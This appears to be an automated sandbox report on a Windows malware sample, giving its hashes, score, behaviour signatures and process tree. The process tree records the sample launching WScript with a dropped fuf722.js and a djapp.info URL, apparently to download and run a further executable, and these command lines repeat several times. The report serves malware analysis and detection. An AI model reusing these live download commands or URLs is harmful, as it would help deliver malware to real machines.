Analysis

  • max time kernel: 118s
  • max time network: 126s
  • platform: windows7_x64
  • resource: win7-20231129-en
  • resource tags: arch:x64, arch:x86, image:win7-20231129-en, locale:en-us, os:windows7-x64, system
  • submitted: 01/06/2024, 20:12

General

  • Target: 8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe
  • Size: 184KB
  • MD5: 8ba333b98a38b67f9d30f42dc614afe7
  • SHA1: e0a78d2648530a0606b41421b56c2c9cff8c608c
  • SHA256: 29dabe35f9152188abfde68ee58856d47a421c7d7bda87ff68c5bf5f692d00df
  • SHA512: 8a0301bdc4565264d364b33cae53d3d7566d911814062d1dcc6cedf5dd91823cf65bc889c59838f23449df9120d40baf35a71900751a6fab21c98439db46931e
  • SSDEEP: 3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO30W:/7BSH8zUB+nGESaaRvoB7FJNndnw

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 14 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\8ba333b98a38b67f9d30f42dc614afe7_JaffaCakes118.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2028
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf722.js" http://www.djapp.info/?domain=SMTLBNXaus.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjRkMq1-z3n14mGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4TnN8h7QLzH0U3xJfiM4HTyzx-uhliieAHsAuFdn1QCdbTV8zh C:\Users\Admin\AppData\Local\Temp\fuf722.exe
      2⤵
      • Blocklisted process makes network request
      • Modifies system certificate store
      PID:3020
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf722.js" http://www.djapp.info/?domain=SMTLBNXaus.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjRkMq1-z3n14mGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4TnN8h7QLzH0U3xJfiM4HTyzx-uhliieAHsAuFdn1QCdbTV8zh C:\Users\Admin\AppData\Local\Temp\fuf722.exe
      2⤵
      • Blocklisted process makes network request
      • Modifies system certificate store
      PID:2804
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf722.js" http://www.djapp.info/?domain=SMTLBNXaus.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjRkMq1-z3n14mGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4TnN8h7QLzH0U3xJfiM4HTyzx-uhliieAHsAuFdn1QCdbTV8zh C:\Users\Admin\AppData\Local\Temp\fuf722.exe
      2⤵
      • Blocklisted process makes network request
      PID:2788
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf722.js" http://www.djapp.info/?domain=SMTLBNXaus.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjRkMq1-z3n14mGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4TnN8h7QLzH0U3xJfiM4HTyzx-uhliieAHsAuFdn1QCdbTV8zh C:\Users\Admin\AppData\Local\Temp\fuf722.exe
      2⤵
      • Blocklisted process makes network request
      PID:1772
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf722.js" http://www.djapp.info/?domain=SMTLBNXaus.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=J_lbzRQbZuXNkEhP-MAPjRkMq1-z3n14mGYrhLIFYhRn3mR0fhGFWYMOySy1fpgP3Tqr4GalSgF027qeVQko4TnN8h7QLzH0U3xJfiM4HTyzx-uhliieAHsAuFdn1QCdbTV8zh C:\Users\Admin\AppData\Local\Temp\fuf722.exe
      2⤵
      • Blocklisted process makes network request
      PID:2892
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2028 -s 460
      2⤵
      • Program crash
      PID:1360

Network

        MITRE ATT&CK Enterprise v15

        Downloads
